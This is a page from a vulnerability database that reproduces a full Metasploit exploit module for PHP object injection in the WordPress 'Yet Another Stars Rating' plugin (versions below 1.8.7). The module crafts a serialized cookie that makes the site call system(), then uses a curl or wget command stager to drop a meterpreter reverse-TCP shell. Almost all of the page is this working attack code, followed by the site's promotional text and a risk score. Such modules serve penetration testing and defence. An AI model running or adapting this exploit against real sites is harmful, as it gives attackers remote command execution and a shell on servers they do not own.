Vulners
Lucene search
WordPress Yet Another Stars Rating PHP Object Injection Exploit
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7',
'Description' => %q{
This module exploits Wordpress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7.
The vulnerability is exploitable if there is the Wordpress site uses a 'yasr_visitor_votes'
shortcode in a page (authenticated or not).
This exploit uses the Requests_Utility_FilteredIterator as WP core class to exploit deserialization.
The class allows to send an array and a callback in the constructur, and it will be called in every foreach loop.
As the vulnerable module uses the unserialized cookie for a foreach loop, it is possible to exploit this behaviour
to exploit the vulnerability.
Wordpress disable deserialization for Requests_Utility_FilteredIterator in Wordpress >= 5.5.2, so the exploit only
works for Wordpress versions < 5.5.2.
Tested on:
- Wordpress 5.4.1,
- Yet Another Stars rating plugin = 1.8.6
- php 5.6 (in php7 you should customize the serialization payload to try the exploitation)
},
'Author' =>
[
'Paul Dannewitz', # Vulnerability Discovery
'gx1 <g.per45[at]gmail.com>', # Exploit Developer
],
'Platform' => 'linux',
'Arch' => ARCH_PHP,
'Targets' => [['WordPress', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'CMDSTAGER::FLAVOR' => 'curl'
},
'CmdStagerFlavor' => ['curl', 'wget'],
'References' =>
[
['URL', 'https://wpscan.com/vulnerability/9207'],
['URL', 'https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress'],
['URL', 'https://www.cybersecurity-help.cz/vulnerabilities/17273/'],
['URL', 'https://cybersecsi.com/study-php-unserialize-object-injection-in-yet-another-stars-rating-plugin-by-using-docker-security-playground/'] # Exploit development explanation
],
'License' => MSF_LICENSE
))
register_options([
OptString.new('PATH_CONTAINING_YASR_SHORTCODE', [true, 'The path containing yasr_visitor_votes shortcode', '/'] ),
OptBool.new('REQUIRE_LOGIN', [true, 'If you need login to view tha path containing yasr shortcode', false] ),
OptString.new('USERNAME', [false, 'The Wordpress username to authenticate with'] ),
OptString.new('PASSWORD', [false, 'The Wordpress username to authenticate with'] )
])
register_advanced_options([
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
])
end
def yasr_path
return datastore['PATH_CONTAINING_YASR_SHORTCODE']
end
def cmdstager_path
@cmdstager_path ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
end
def username
return datastore['USERNAME']
end
def password
return datastore['PASSWORD']
end
def require_login
return datastore['REQUIRE_LOGIN']
end
def check
if not wordpress_and_online?
print_error("#{target_uri} does not seem to be WordPress site")
return
end
version = wordpress_version
if not version.nil?
print_status("#{target_uri} - WordPress Version #{version} detected") if version
if Gem::Version.new(version) >= Gem::Version.new("5.5.2")
print_bad("Version higher or equal to 5.5.2")
return CheckCode::Safe
end
return check_plugin_version_from_readme('yet-another-stars-rating', '1.8.7')
end
return CheckCode::Unknown
end
def serialized_payload(p)
return "C%3A33%3A%22Requests_Utility_FilteredIterator%22%3A#{p.length + 63 + p.length.digits.length }%3A%7Bx%3Ai%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A#{p.length}%3A%22#{URI.encode_www_form_component(p)}%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A6%3A%22system%22%3B%7D%7D"
end
def exploit
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
if require_login
print_status("Authentication required, try to login")
cookie = wordpress_login(username, password)
if cookie
print_status("Login successed")
else
fail_with('Authentication failed', "Unable to login")
end
else # No login: empty cookie
cookie = ""
end
print_status("Run exploit")
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
@cmdstager = generate_cmdstager(
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path)
).join(';')
register_file_for_cleanup(cmdstager_path)
sp = serialized_payload(@cmdstager)
print_status("Send serialized payload: #{sp}")
cookie = "#{cookie} yasr_visitor_vote_cookie=#{sp}"
res = send_request_cgi({
'method' => 'GET',
'uri' => yasr_path,
'cookie' => cookie},
1)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Dec 2020 00:00Current
7.6High risk
Vulners AI Score7.6